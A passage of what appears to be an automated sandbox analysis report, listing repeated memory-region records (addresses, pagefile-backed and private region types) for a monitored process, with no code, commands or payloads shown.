pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5752 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5753 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5754 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5755 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5756 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5757 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5758 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5759 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5760 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5761 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5762 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5763 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5764 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5765 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5766 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5767 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 5768 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 5769 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5770 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5771 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5772 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5773 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5774 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5775 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5776 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5777 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5778 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5779 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5780 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5781 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5782 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5783 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5784 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5785 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5786 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5787 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5788 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5789 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5790 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5791 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5792 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5793 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5794 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5795 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5796 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5797 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5798 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 5799 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5800 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5801 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5802 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 5803 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 5804 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5805 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5806 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5807 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5808 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5809 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5810 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5811 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5812 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5813 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5814 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5815 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5816 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5817 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5818 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5819 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5820 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5821 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5822 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5823 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5824 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5825 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5826 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5827 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5828 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5829 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5830 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5831 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5832 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5833 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5834 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5835 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5836 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5837 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5838 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5839 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5840 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5841 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5842 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5843 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5844 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5845 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5846 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5847 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5848 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5849 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 5850 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 5851 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5852 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5853 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5854 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5855 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5856 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5857 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5858 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5859 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5860 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5861 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5862 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5863 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5864 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5865 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5866 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5867 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5868 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5869 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5870 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5871 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5872 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5873 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5874 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5875 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5876 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5877 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5878 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5879 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5880 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5881 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5882 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5883 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5884 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5885 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5886 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5887 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5888 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5889 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5890 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5891 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5892 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5893 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5894 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5895 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5896 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5897 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5898 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5899 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5900 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5901 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5902 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5903 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5904 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5905 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5906 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5907 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5908 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 5909 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5910 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5911 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5912 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5913 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5914 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5915 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5916 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5917 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 5918 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5919 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5920 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5921 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 5922 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 5923 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5924 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5925 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5926 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5927 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5928 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5929 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5930 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5931 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5932 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5933 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5934 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5935 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5936 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5937 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5938 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5939 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name 